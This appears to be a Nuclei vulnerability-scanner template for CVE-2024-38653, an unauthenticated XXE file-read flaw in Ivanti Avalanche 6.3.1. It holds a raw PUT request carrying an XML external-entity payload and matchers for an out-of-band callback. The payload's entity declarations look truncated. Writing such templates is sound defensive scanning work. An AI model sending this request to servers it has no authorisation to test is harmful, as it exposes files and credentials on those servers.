id: CVE-2024-38653 info: name: Ivanti Avalanche SmartDeviceServer - XML External Entity author: DhiyaneshDK severity: high description: | XXE in SmartDeviceServer in Ivanti Avalanche 6.3.1 allows a remote unauthenticated attacker to read arbitrary files on the server. impact: | Unauthenticated attackers can read arbitrary files from the Ivanti Avalanche server, potentially exposing configuration files, credentials, and sensitive data managed by the device management system. remediation: | Upgrade to Ivanti Avalanche version 6.4.0 or later that addresses this XXE vulnerability. reference: - https://github.com/D4mianWayne/POCs/tree/main/CVE%202024-38653 - https://github.com/fkie-cad/nvd-json-data-feeds - https://nvd.nist.gov/vuln/detail/cve-2024-38653 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2024-38653 cwe-id: CWE-611 epss-score: 0.90534 epss-percentile: 0.99631 cpe: cpe:2.3:a:ivanti:avalanche:6.3.1:*:*:*:premise:*:*:* metadata: max-request: 1 vendor: ivanti product: avalanche tags: cve,cve2024,intrusive,ivanti,avalanche,xxe,vkev,vuln variables: filename: "{{to_lower(rand_text_alpha(5))}}" http: - raw: - | PUT /mdm/checkin HTTP/1.1 Host: {{Hostname}} Content-Type: application/xml %asd; %c; ]> matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http" - type: word part: interactsh_request words: - "User-Agent: Java" # digest: 490a0046304402206f4d1c987dce3d3ab9fbe99c0aa341895e666f9fa8f843cc0506f0eecd679539022035974711861094ff63303733258e95034840fd436e1a67c9cd1cac640dc89822:922c64590222798bb761d5b6d8e72950